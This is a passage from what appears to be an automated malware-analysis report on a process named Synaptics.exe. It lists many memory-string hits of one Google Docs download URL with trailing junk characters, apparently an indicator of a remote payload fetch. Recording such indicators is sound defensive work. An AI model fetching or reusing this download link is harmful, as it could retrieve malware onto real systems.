https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=C
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=D
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=O
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=e
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=j
                                Source: Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D93E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4194221853.000000001DE3B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?2
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?fm
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4139287238.000000000EFD2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4188042164.000000001DCEB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA-YV
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA1
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAF
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAe
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAj
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4144627466.000000000F1F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB0
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBE
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBQ
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBd
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCI
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCPS.x
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCh
                                Source: Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCy
                                Source: Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD2
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDG
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DB27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDenetx
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDf
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4139287238.000000000EFD2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.00000000081C6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4188042164.000000001DCEB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.000000000568F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEK
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEd
                                Source: Synaptics.exe, 00000002.00000002.4093452234.00000000080AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEvp
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D93E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.000000000088B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.000000000568F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4144627466.000000000F1F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFJ
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.000000000568F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadGx
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHB&
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHL
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHk
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4139287238.000000000EFD2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.00000000081C6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4188042164.000000001DCEB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4144627466.000000000F1F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI0
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIE
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIZ6S
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIc
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadId
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIh
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI~
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000818E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.000000000568F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4144627466.000000000F1F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJT
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DB27000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKg
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKoZQ
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.000000000088B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL1
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLA
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLF
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4139287238.000000000EFD2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.00000000081C6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4188042164.000000001DCEB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D93E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMJ
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMb
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMg
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMi
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadModel
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMon
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DB27000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.2572800198.000000003BBB8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.000000000568F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4144627466.000000000F1F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D93E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNB7
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNI
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNS
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNh
                                Source: Synaptics.exe, 00000002.00000002.4093452234.00000000080AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNtw
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.0000000005660000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.2572800198.000000003BBB8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.000000000568F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPK
                                Source: Synaptics.exe, 00000002.00000002.4093452234.00000000080AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPv
